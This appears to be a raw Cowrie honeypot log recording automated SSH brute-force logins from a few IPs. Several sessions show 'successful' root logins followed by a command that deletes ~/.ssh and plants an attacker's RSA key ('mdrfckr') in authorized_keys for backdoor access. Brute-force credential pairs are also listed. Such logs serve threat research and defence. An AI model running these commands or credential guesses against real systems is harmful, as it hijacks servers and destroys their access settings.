{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:18:05.982428Z","src_ip":"212.227.235.229","session":"adefc1d15eb9"}
{"eventid":"cowrie.session.closed","duration":"6.0","message":"Connection lost after 6.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:05.984497Z","src_ip":"212.227.235.229","session":"adefc1d15eb9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48666,"dst_ip":"1.2.3.4","dst_port":22,"session":"941747552bb6","protocol":"ssh","message":"New connection: 212.227.235.229:48666 (1.2.3.4:22) [session: 941747552bb6]","sensor":"my-vps","timestamp":"2025-09-08T23:18:17.536013Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:18:17.536856Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:18:17.851223Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.login.success","username":"root","password":"hetzner12345","message":"login attempt [root/hetzner12345] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:18:19.129442Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:18:19.797997Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:18:19.798719Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:18:19.799534Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:20.108999Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:18:20.995354Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:18:20.996104Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:18:21.306762Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:21.307767Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48678,"dst_ip":"1.2.3.4","dst_port":22,"session":"7312984c3e97","protocol":"ssh","message":"New connection: 212.227.235.229:48678 (1.2.3.4:22) [session: 7312984c3e97]","sensor":"my-vps","timestamp":"2025-09-08T23:18:21.604921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:18:21.605742Z","src_ip":"212.227.235.229","session":"7312984c3e97"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:18:21.906128Z","src_ip":"212.227.235.229","session":"7312984c3e97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46953,"dst_ip":"1.2.3.4","dst_port":23,"session":"5ca0101d4519","protocol":"telnet","message":"New connection: 212.227.125.160:46953 (1.2.3.4:23) [session: 5ca0101d4519]","sensor":"my-vps","timestamp":"2025-09-08T23:18:23.138402Z"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:18:23.574790Z","src_ip":"212.227.235.229","session":"7312984c3e97"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:24.995747Z","src_ip":"212.227.235.229","session":"7312984c3e97"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54778,"dst_ip":"1.2.3.4","dst_port":22,"session":"175134a571a7","protocol":"ssh","message":"New connection: 212.227.235.229:54778 (1.2.3.4:22) [session: 175134a571a7]","sensor":"my-vps","timestamp":"2025-09-08T23:18:25.305877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:18:25.306689Z","src_ip":"212.227.235.229","session":"175134a571a7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:18:25.617911Z","src_ip":"212.227.235.229","session":"175134a571a7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:18:27.239112Z","src_ip":"212.227.235.229","session":"175134a571a7"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:27.551235Z","src_ip":"212.227.235.229","session":"175134a571a7"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:27.552342Z","src_ip":"212.227.235.229","session":"941747552bb6"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":60340,"dst_ip":"1.2.3.4","dst_port":22,"session":"4114189788b7","protocol":"ssh","message":"New connection: 217.72.205.35:60340 (1.2.3.4:22) [session: 4114189788b7]","sensor":"my-vps","timestamp":"2025-09-08T23:18:32.632861Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:32.633919Z","src_ip":"217.72.205.35","session":"4114189788b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59786,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a0dd705fef2","protocol":"ssh","message":"New connection: 212.227.235.229:59786 (1.2.3.4:22) [session: 3a0dd705fef2]","sensor":"my-vps","timestamp":"2025-09-08T23:18:34.830214Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:18:34.831173Z","src_ip":"212.227.235.229","session":"3a0dd705fef2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:18:34.926678Z","src_ip":"212.227.235.229","session":"3a0dd705fef2"}
{"eventid":"cowrie.login.failed","username":"openhabian","password":"openhabian","message":"login attempt [openhabian/openhabian] failed","sensor":"my-vps","timestamp":"2025-09-08T23:18:35.348559Z","src_ip":"212.227.235.229","session":"3a0dd705fef2"}
{"eventid":"cowrie.session.closed","duration":12.974669933319092,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:36.112992Z","src_ip":"212.227.125.160","session":"5ca0101d4519"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:36.445848Z","src_ip":"212.227.235.229","session":"3a0dd705fef2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60068,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5d620283509","protocol":"ssh","message":"New connection: 212.227.235.229:60068 (1.2.3.4:22) [session: b5d620283509]","sensor":"my-vps","timestamp":"2025-09-08T23:18:53.029650Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:18:53.030457Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:18:53.167260Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.login.success","username":"root","password":"zxc123..","message":"login attempt [root/zxc123..] succeeded","sensor":"my-vps","timestamp":"2025-09-08T23:18:53.736055Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:18:54.052704Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:18:54.053490Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T23:18:54.054476Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:54.186833Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T23:18:54.511669Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T23:18:54.512414Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T23:18:54.650752Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:54.651651Z","src_ip":"212.227.235.229","session":"b5d620283509"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44444,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2646313508e","protocol":"ssh","message":"New connection: 212.227.235.229:44444 (1.2.3.4:22) [session: b2646313508e]","sensor":"my-vps","timestamp":"2025-09-08T23:18:54.790276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:18:54.790977Z","src_ip":"212.227.235.229","session":"b2646313508e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T23:18:54.923883Z","src_ip":"212.227.235.229","session":"b2646313508e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T23:18:55.511131Z","src_ip":"212.227.235.229","session":"b2646313508e"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T23:18:56.650801Z","src_ip":"212.227.235.229","session":"b2646313508e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44458,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea02d0c15bf0","protocol":"ssh","message":"New connection: 212.227.235.229:44458 (1.2.3.4:22) [session: ea02d0c15bf0]","sensor":"my-vps","timestamp":"2025-09-08T23:18:56.783360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T23:18:56.783997Z","src_ip":"212.227.235.229","session":"ea02d0c15bf0"}
